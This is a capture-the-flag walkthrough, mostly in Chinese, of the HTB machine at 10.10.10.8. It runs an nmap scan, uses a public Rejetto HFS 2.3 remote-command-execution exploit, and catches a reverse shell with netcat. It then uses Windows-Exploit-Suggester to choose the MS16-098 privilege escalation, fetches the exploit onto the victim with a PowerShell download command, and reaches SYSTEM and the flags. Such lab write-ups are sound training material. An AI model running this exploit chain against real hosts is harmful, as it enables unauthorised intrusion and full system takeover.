Scanning and Enumeration:
nmap:
nmap -sC -sV -O 10.10.10.8
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-30 05:32 EDT
Nmap scan report for 10.10.10.8
Host is up (0.20s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
....
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds
一個端口是開啟:
✎80/tcp open http HttpFileServer httpd 2.3
Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (2)
使用這份exploit有兩個條件
1.在本地開啟80端口,並且存在netcat.exe
2.修改exploit內的ip_addr 和 local_port
Exploit:
locate nc.exe //搜尋系統中的nc.exe位置
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .//將nc.exe複製至當前當前目錄
python2 -m SimpleHTTPServer 80 //在本地開啟80端口,供exploit使用
python2 39161.py 10.10.10.8 80 //執行exploit
rlwarp nc -nlvp 4444 //接收exploit成功之後返回的reverse shell
Privilege Escalation
使用Windows-Exploit-Suggester辨別受害機上有無可以進行提權的漏洞
下載項目:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
安裝依賴項:
pip install xlrd --upgrade
更新資料庫(產生一份含有漏洞資料庫的excel表格):
python2 windows-exploit-suggester.py --update
受害機輸入 systeminfo ,將輸出內容複製至systeminfo.txt
┌──(root㉿kali)-[~/Desktop/HTB/tool/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --database 2023-08-30-mssb.xls --systeminfo sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
......
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
---
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
Traceback (most recent call last):
File "windows-exploit-suggester.py", line 1639, in <module>
main()
File "windows-exploit-suggester.py", line 414, in main
wb = xlrd.open_workbook(ARGS.database)
File "/usr/local/lib/python2.7/dist-packages/xlrd/__init__.py", line 170, in open_workbook
raise XLRDError(FILE_FORMAT_DESCRIPTIONS[file_format]+'; not supported')
xlrd.biffh.XLRDError: Excel xlsx file; not supported
如果出現以上錯誤,執行下方指令即可修正
pip install xlrd==1.2.0
Microsoft Windows 8.1 (x64) – ‘RGNOBJ’ Integer Overflow (MS16-098)
將提權腳本傳送至受害機:
攻擊機: python2 -m SimpleHTTPServer 9005
受害機: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.11:9005/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
c:\Users\Public\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\Users\Public\Downloads>whoami
whoami
nt authority\system
Get FLAG:
c:\Users\Administrator\Desktop>type root.txt
type root.txt
375a8619...
c:\Users\kostas\Desktop>type user.txt
type user.txt
d99d457f...